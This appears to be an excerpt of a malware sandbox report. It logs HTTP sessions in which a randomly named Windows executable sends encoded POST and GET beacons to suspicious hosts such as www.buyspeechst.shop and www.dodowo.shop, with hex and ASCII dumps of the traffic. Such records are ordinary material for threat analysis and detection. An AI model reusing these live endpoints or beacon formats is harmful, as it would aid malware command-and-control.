                                                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_b+0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     7 | 192.168.2.6 | 49994 | 104.21.112.1 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:49:28.632553101 CET | 1885 | OUT | POST /qzi3/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Origin: http://www.buyspeechst.shop
                                                                                                                    Referer: http://www.buyspeechst.shop/qzi3/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 1247
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 55 75 46 51 56 56 2f 79 7a 32 42 72 57 54 34 77 75 6e 50 65 64 4f 2f 35 43 61 49 45 61 35 58 30 35 46 46 75 4a 73 4b 58 42 43 7a 38 6d 6a 43 75 57 39 62 44 73 51 71 74 54 38 30 52 73 56 47 54 46 4d 4a 68 77 65 53 6e 6b 4e 71 56 58 4c 51 58 6f 5a 79 33 4e 6f 78 34 33 4d 7a 7a 51 30 50 58 67 64 37 35 69 64 45 4e 48 6c 65 67 30 2f 4c 51 78 48 7a 4d 4d 4b 31 4d 78 71 49 55 47 4c 74 31 6f 6f 65 51 71 36 2b 2f 6b 42 39 33 70 74 6c 58 36 31 4f 56 6c 4f 74 2f 6f 58 57 33 47 61 4d 62 49 33 6d 67 71 50 50 74 52 66 33 57 36 4e 52 4d 78 6a 4f 34 75 4e 61 57 4b 48 79 39 57 77 4d 49 35 4d 78 74 4c 70 2f 67 48 6b 70 49 54 66 67 4b 59 55 6b 69 6f 35 70 45 66 6d 61 51 62 75 45 69 56 32 63 6e 48 63 33 32 6f 46 78 71 7a 2f 35 37 4b 6a 2f 62 31 38 65 68 73 58 65 63 6b 55 61 39 46 69 6e 5a 43 4a 69 6e 6c 6a 33 4b 4c 4b 4c 76 6e 37 6f 6d 50 6f 70 58 79 77 73 46 6a 71 77 73 74 59 74 52 39 2f 33 73 67 2f 44 4e 6b 79 71 37 4c 78 44 44 2b 4c 65 73 4b 58 68 32 2f 74 72 44 78 78 4c 32 4d 6c 67 71 30 49 4c [TRUNCATED]
                                                                                                                    Data Ascii: nzs0T2=UuFQVV/yz2BrWT4wunPedO/5CaIEa5X05FFuJsKXBCz8mjCuW9bDsQqtT80RsVGTFMJhweSnkNqVXLQXoZy3Nox43MzzQ0PXgd75idENHleg0/LQxHzMMK1MxqIUGLt1ooeQq6+/kB93ptlX61OVlOt/oXW3GaMbI3mgqPPtRf3W6NRMxjO4uNaWKHy9WwMI5MxtLp/gHkpITfgKYUkio5pEfmaQbuEiV2cnHc32oFxqz/57Kj/b18ehsXeckUa9FinZCJinlj3KLKLvn7omPopXywsFjqwstYtR9/3sg/DNkyq7LxDD+LesKXh2/trDxxL2Mlgq0IL3GYxp6MEgmVBmjcXOyouVT2BlJz1N50WfcM3u6iR3xfLHDD/EincIavn/gZOn7Gy3cZ4DhvgjhTeybVCzrGm1xNADQbgieKC4LxQnDU+ahYkch5uP2K6vk0ET5yrmRfZdcjd6kmq3QZOmpSso4bTO72SY+52SYK9fRLOfOL3waR9rp7+kcYLpnDeTjv7WmMi4cZAD3k3/xnwGiiNL2ai4YaP1HMIaEh6GMtNZGShIPXcqHy7Uzykk4vgWUIiOob27iAfRsnGW5kEr5RuZiR9MCmC33adTq70haWPgwGoli7VbqPA1pzg421ViNswvjOtVwe1lklNCWdq8vi255q4OqECexCqzA0mI2xJObjjaLnWdNvUfEfEPhT6zgOhV3Da++NgoAsgGZEu/GCPdpI+2xMF/4IVFZqra5JTIH2f3AREJXCjz5gQC4CrFA0xLvbyH0Q7iVQp9eOVY8ydYhds/s6ofuGo7osW6irp0uBUTQKBi+YtGRTk/+E3dSUe6oviP66ADU5QmjrVM9ErFvY7892p+Ik5isZZQ68CI6WZ8IL9GgulbD9Y33EDVATRAPyzzplbcKto0d52rw+6t+F2Uset9G/W5QwB4cW51re3vf3Ng5QGOVDYybXBiQGD4IDenniGQOIsc2ZG911XNt/JLzMLXvKiZ24Aij [TRUNCATED]
                                                                                                                     Jan 10, 2025 20:49:29.242144108 CET | 1043 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:29 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmLav09NF1diV4TQQ10ObZImDP0HyhpxDukRJdCuQ8KTDEhhxXijN1xtcWUtPvh2sQ%2FH0vLNungj27aNSinRyp67g5iCey7N7pXul%2BUEduoivihgUyNcpK0KUcfhdwUbF2cw2dh6YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30c85eb843b3-EWR
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1606&rtt_var=803&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1885&delivery_rate=0&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a
                                                                                                                    Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0|YC6$/]_
                                                                                                                     Jan 10, 2025 20:49:29.242806911 CET | 21 | IN | Data Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: b+0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     8 | 192.168.2.6 | 49995 | 104.21.112.1 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:49:31.173302889 CET | 587 | OUT | GET /qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.buyspeechst.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                     Jan 10, 2025 20:49:31.809032917 CET | 1070 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:31 GMT
                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uHbqSQHjPKquvRJKM0e3FIZr%2F0n%2BrkuGSQ36wCPGT3DzCpXH530QA5upd14kszqy7m2fUL5UAeggMbGZTKNv83t0ncJJqyAaukwNhUoLUk4Iv5xlw3em8IVBSAuVfMmtS0Iv0aUeMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8fff30d86a36727b-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2312&min_rtt=2312&rtt_var=1156&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=587&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 75 79 73 70 65 65 63 68 73 74 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                    Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port 80</address></body></html>
                                                                                                                     Jan 10, 2025 20:49:31.809735060 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     9 | 192.168.2.6 | 49996 | 112.175.247.179 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:49:38.200927973 CET | 833 | OUT | POST /44mq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Origin: http://www.dodowo.shop
                                                                                                                    Referer: http://www.dodowo.shop/44mq/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 53 71 61 6b 5a 51 38 39 48 2f 56 57 71 35 55 6d 50 5a 66 58 43 33 4b 35 4d 52 7a 44 30 75 44 4c 43 49 33 69 37 4a 6b 33 46 59 76 4c 4c 6e 70 50 70 41 41 35 33 45 73 31 49 6b 6a 66 5a 69 79 64 73 50 56 5a 66 65 52 34 41 63 41 6e 6c 48 51 54 45 63 44 30 53 59 35 5a 6d 5a 37 6e 65 48 4d 77 57 37 70 75 34 58 52 47 62 6c 59 34 4f 4e 45 37 68 4b 38 6e 6a 58 55 70 55 42 50 49 54 53 78 62 49 49 36 43 65 4b 76 37 4d 78 46 77 2b 63 70 2f 4b 57 49 75 7a 52 2f 76 57 56 74 37 72 66 65 48 4f 6e 69 39 51 47 4f 37 58 2f 57 6b 42 69 4b 7a 4a 74 73 63 72 37 67 79 79 62 6e 5a 72 75 43 35 75 55 6d 6f 35 4d 4d 49 58 4d 50 34
                                                                                                                    Data Ascii: nzs0T2=SqakZQ89H/VWq5UmPZfXC3K5MRzD0uDLCI3i7Jk3FYvLLnpPpAA53Es1IkjfZiydsPVZfeR4AcAnlHQTEcD0SY5ZmZ7neHMwW7pu4XRGblY4ONE7hK8njXUpUBPITSxbII6CeKv7MxFw+cp/KWIuzR/vWVt7rfeHOni9QGO7X/WkBiKzJtscr7gyybnZruC5uUmo5MMIXMP4
                                                                                                                     Jan 10, 2025 20:49:39.360182047 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:39 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 65 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5a 4b 93 db c6 11 3e 7b 7f c5 2c 54 d9 05 2c 00 04 c0 37 29 48 65 cb 72 2a 89 1d b9 f4 28 1f b4 8a 6a 08 0c 49 48 78 69 06 d8 47 28 56 f9 90 4a e5 e0 ca c5 a9 8a 0f f1 31 95 6b 0e 39 e4 e0 ca 0f 8a e5 ff 90 9e 01 49 80 e4 f0 b1 a4 a2 5a 81 c4 4c 77 7f 3d 3d dd 3d 3d 33 bc 77 ea 27 5e 76 93 12 34 ce a2 f0 fe c9 3d fe 81 42 1c 8f 5c e5 4d 62 fc e6 89 82 bc 10 33 e6 2a 71 62 bc 66 0a 0a 32 12 71 7a 57 19 67 59 ca 7a b5 1a f3 c6 24 c2 66 42 47 b5 af c9 e0 2b 3c 22 05 15 f3 92 94 70 89 04 fb f7 4f 3e ba 17 91 0c 23 6f 8c 29 23 99 ab 3c 7f f6 b9 d1 51 16 ed 31 8e 40 e4 65 40 ae d2 84 66 00 9a c4 19 89 81 ee 2a f0 b3 b1 eb 93 cb c0 23 86 78 d1 51 10 07 59 80 43 83 79 38 24 ae ad a3 08 5a a2 3c 9a 37 08 b1 59 90 85 e4 fe cf 7f fe fe fd 0f ff 7a ff 8f 6f 7e fa fb 8f e8 fd 3f ff f3 fe 87 3f a0 f7 7f fa 1e bd ff eb 1f df ff f0 2d 3a bb d3 71 6c bb 8f 7c 0f 7b 8e 63 d5 3b d6 bd 5a c1 78 52 d1 eb 9c 26 83 24 63 e7 0b ad ce 23 7c 6d 04 11 0c d5 48 29 e1 5a f7 42 4c [TRUNCATED]
                                                                                                                    Data Ascii: e99ZK>{,T,7)Her*(jIHxiG(VJ1k9IZLw====3w'^v4=B\Mb3*qbf2qzWgYz$fBG+<"pO>#o)#<Q1@e@f*#xQYCy8$Z<7Yzo~??-:ql|{c;ZxR&$c#|mH)ZBLG84n@BzS_,QIm8 h38Y-J{B:AQ~"Cys4oy'~rlBAaFh3b2q kQ]RQ6OwS(%|`f7DLhG0->8|G!XfR%DEUI'WA^OI!Mf9,P.j5f^8a)%5|Qe/jm\]!i<v9:L0i{S( fM/jW)>yD0`n(4_-mt?}|AH|r7F$&}qt5cmr)Jty*&};ay32#zDGiOk%sxj>#YBL&_`D5Q0Q3M1N\5>B0}BLtK
                                                                                                                     Jan 10, 2025 20:49:39.360224962 CET | 1236 | IN | Data Raw: 87 77 1c 5f 62 98 06 91 98 16 af 63 12 8c c6 99 06 0d 30 ea f0 19 4c a3 9a 01 b9 a5 f5 8b 01 70 2d 9f 43 a0 d7 9d 4f 28 c5 37 2a 31 47 a0 13 9f 43 d0 1d ef 23 da f4 81 50 d3 a9 ab 1e a1 53 2c 74 d2 3f 94 36 5a 9f 92 2c a7 31 ca 4c 02 4e 70 a3 2e
                                                                                                                    Data Ascii: w_bc0Lp-CO(7*1GC#PS,t?6Z,1LNp.Mfu]"{9Js=(e1r1Ew<E>$"w,ge#`L{pjNC\^WV!tU<^]T7+2B4Zn9B1i-?k03
                                                                                                                     Jan 10, 2025 20:49:39.360238075 CET | 1236 | IN | Data Raw: 77 86 c3 61 bf 34 a4 31 6b ad 3b f5 76 dd eb 17 2e 61 50 ec 07 39 eb 75 e1 5f 7a dd af 38 03 b7 7a 9f a7 68 c3 27 b0 63 15 fb ff a2 71 6e 7c 98 43 4f 35 5b 2d 3e c5 77 11 d4 51 1a 12 4d b6 59 af d7 17 6d 7d 5e 6b 15 c7 24 b6 69 3b 4d 12 4d 4b ad
                                                                                                                    Data Ascii: wa41k;v.aP9u_z8zh'cqn|CO5[->wQMYm}^k$i;MMK^*tT|de 2U]Zv$LI{4Ia,6Y!{cJFVzDV"9;[V.PfVcr@ll(:w`V_L&!1Rp^N
                                                                                                                     Jan 10, 2025 20:49:39.360251904 CET | 408 | IN | Data Raw: 61 75 df b4 a7 f4 15 b6 8d b6 be b5 e4 55 b6 4d 1e 51 ee 32 f7 93 bb cc b4 51 df db 8a 5d e1 da 28 b7 28 e7 6f 25 b4 60 91 48 2c 62 7e f5 5c 77 b2 76 d0 fb 01 32 c1 31 20 7b e7 87 63 40 76 67 8d 63 a4 ef 97 4b 8e 41 b8 7d 86 39 06 ed a8 bc f3 01
                                                                                                                    Data Ascii: auUMQ2Q]((o%`H,b~\wv21 {c@vgcKA}9FGa}:[fvj&Aru# uvr(a`9 gr\umss(V?2V%CQ*o<n+9N Tr!Cl
                                                                                                                     Jan 10, 2025 20:49:39.360265017 CET | 1236 | IN | Data Raw: 62 30 30 0d 0a ec 1d 6b 6f e3 36 f2 af 08 1b 1c b0 2e 2c ad 25 d9 4e a2 a0 8b 03 0a 1c 0a 14 fd 70 d7 8f 45 b1 90 6d d9 16 d6 b6 04 59 4e b6 35 f2 df 3b 33 7c 88 12 49 89 8a d3 7e b9 6e 90 85 cd c7 cc 68 34 9c 17 87 4c 4f 3d e3 d7 74 93 9d d6 99
                                                                                                                    Data Ascii: b00ko6.,%NpEmYN5;3|I~nh4LO=tgf'$?QRVGUCFu{x_~Qujpazbyr7_Hc,5h=v]nkcuz*iiC=-2CmYqa`L
                                                                                                                     Jan 10, 2025 20:49:39.360285044 CET | 224 | IN | Data Raw: 6f 10 ed ce 4b c7 14 25 33 2a bc 5a d9 22 16 d7 be 07 e0 b2 95 50 9e 05 c2 3e f6 6d 5b ac 2f 67 f9 2d 5d d7 f9 73 26 c5 4f 8c 0d da 83 83 ee 68 23 31 72 b2 b9 57 c0 32 f7 0a d0 26 31 17 80 8d 7d 1c ac b1 cf 04 94 af 12 13 4c d1 65 00 29 ba 4c 10
                                                                                                                    Data Ascii: oK%3*Z"P>m[/g-]s&Oh#1rW2&1}Le)L3}O}UJ^"^)7-hFup-<jk|+S}b'A@Y=RN]Nuz]L?<pABLX[[a|p[K
                                                                                                                     Jan 10, 2025 20:49:39.360296965 CET | 1236 | IN | Data Raw: 2e a2 1d 1c 8b 55 0e b6 ea 6f 43 2c 9c ad bf 04 af 48 24 f8 78 4d 29 de 37 e4 a5 e0 ae d4 1f 65 3b 90 55 fb 28 77 93 26 eb e0 b3 43 30 b2 2b 59 65 e0 7c 64 f2 18 0c dd c1 a1 7a b0 01 4a 20 ed 80 7a fb 88 53 48 f7 73 da bc 24 96 ef 99 f5 e6 38 e7
                                                                                                                    Data Ascii: .UoC,H$xM)7e;U(w&C0+Ye|dzJ zSHs$8!Vc&X?ficz;ou+9aeB85\}UwgdBgo[w\+-\.uDEYQ,M-{f{e*'t]an@yX"z]ONvt
                                                                                                                     Jan 10, 2025 20:49:39.360308886 CET | 127 | IN | Data Raw: 19 78 64 c9 8a eb 1b 98 8e 48 16 56 1c ad 1c ef 10 a5 3a 10 46 bd f1 6d 0e 80 76 78 7d f6 a9 7f e9 1b 6c f1 d6 89 33 06 c6 2c 18 7b a5 7e f1 02 0e 02 ff 8a e7 58 67 99 ca 9e 5d 62 58 1d 9d 1a 46 f2 a6 4e 18 29 13 04 ef 95 fb a3 9e 59 b7 47 2d 8c
                                                                                                                    Data Ascii: xdHV:Fmvx}l3,{~Xg]bXFN)YG-jOC$MVv4
                                                                                                                     Jan 10, 2025 20:49:39.367150068 CET | 1236 | IN | Data Raw: 62 34 64 0d 0a c4 5d 4f 6f 24 47 15 3f b3 9f a2 99 15 08 89 74 bb fe 76 75 05 db 91 08 a0 e4 b0 68 95 80 38 5a e3 b1 63 0f 3b f6 58 33 f6 38 d9 13 42 42 8a 14 0e 20 0e 48 20 0e 91 22 e5 82 50 38 22 3e d2 3a df 81 f7 fb 55 75 4f cf 78 66 d6 6c 1c
                                                                                                                    Data Ascii: b4d]Oo$G?tvuh8Zc;X38BB H "P8">:UuOxflEz_]x9Gx9az'+teG",JDEzbEqydxq#Uxn6x[TE'toQXSN/&crHtC"I_4
                                                                                                                     Jan 10, 2025 20:49:39.367180109 CET | 1236 | IN | Data Raw: d5 67 9f 7e fd d9 57 3d f2 f6 6e 26 87 4b 07 be bf 27 b6 9c 3c ff d3 35 8f 93 bc fd d6 d0 b0 c1 7f b1 c7 1b 78 e8 07 78 cb 9c 60 a5 9b 2f eb 61 be 8d 18 cb 1b 38 c2 a0 ad ed bd 6c 29 3f 0f b5 a1 25 d7 f0 7e 1e 9d 5b 8e 01 6d 3d 1d 28 fc fe e9 49
                                                                                                                    Data Ascii: g~W=n&K'<5xx`/a8l)?%~[m=(IOtBxE.!d\.S6r2p_5-n3;=@,B6#[:q'B_sKc,y(KYOTe^
                                                                                                                     Jan 10, 2025 20:49:39.367192984 CET | 428 | IN | Data Raw: 1c aa c6 27 73 01 a5 92 25 93 eb be 7e c3 68 fc fe e5 fc 7a 78 36 1b 5e 7c eb f1 78 dc 8d f4 58 11 b9 c3 f8 9d c7 e4 8e 8b f7 a3 b2 58 d2 37 c8 31 b5 92 94 31 f7 46 af 22 61 e8 81 cc 4d ce c3 bb 9a 54 3e 97 ae b9 63 ea 54 26 04 04 49 63 d0 8d c3
                                                                                                                    Data Ascii: 's%~hzx6^|xXX711F"aMT>cT&IcvQRkz%[48"SySOZI.9/i1P.2Hl=QWG/&%}CNbe~&2'*0r$@g


                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                     10 | 192.168.2.6 | 49997 | 112.175.247.179 | 80 | 2196 | C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                     Jan 10, 2025 20:49:40.747273922 CET | 857 | OUT | POST /44mq/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.dodowo.shop
                                                                                                                    Origin: http://www.dodowo.shop
                                                                                                                    Referer: http://www.dodowo.shop/44mq/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 235
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 53 71 61 6b 5a 51 38 39 48 2f 56 57 72 5a 6b 6d 4e 37 33 58 41 58 4b 36 51 68 7a 44 69 65 44 58 43 49 72 69 37 49 67 6e 46 71 4c 4c 46 6c 78 50 71 45 30 35 30 45 73 31 44 45 6a 61 64 69 79 73 73 50 51 6d 66 62 35 34 41 63 55 6e 6c 47 67 54 45 76 37 31 53 49 35 58 70 35 37 6c 44 58 4d 77 57 37 70 75 34 57 31 38 62 6c 51 34 50 2b 63 37 67 75 6f 6b 67 58 55 71 44 78 50 49 43 69 77 51 49 49 36 67 65 49 62 46 4d 33 42 77 2b 64 5a 2f 4a 48 49 76 39 52 2f 68 4c 6c 73 74 72 4b 6d 50 58 57 76 4f 63 6e 36 44 43 38 4f 6d 45 55 58 70 56 65 73 2f 35 72 41 77 79 5a 2f 72 72 4f 43 54 73 55 65 6f 72 62 41 76 59 34 71 62 72 34 63 41 68 6e 56 43 4a 4c 35 79 76 67 51 57 68 59 63 64 58 51 3d 3d
                                                                                                                    Data Ascii: nzs0T2=SqakZQ89H/VWrZkmN73XAXK6QhzDieDXCIri7IgnFqLLFlxPqE050Es1DEjadiyssPQmfb54AcUnlGgTEv71SI5Xp57lDXMwW7pu4W18blQ4P+c7guokgXUqDxPICiwQII6geIbFM3Bw+dZ/JHIv9R/hLlstrKmPXWvOcn6DC8OmEUXpVes/5rAwyZ/rrOCTsUeorbAvY4qbr4cAhnVCJL5yvgQWhYcdXQ==
                                                                                                                    Jan 10, 2025 20:49:41.905973911 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: openresty
                                                                                                                    Date: Fri, 10 Jan 2025 19:49:41 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://dodowo.shop/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
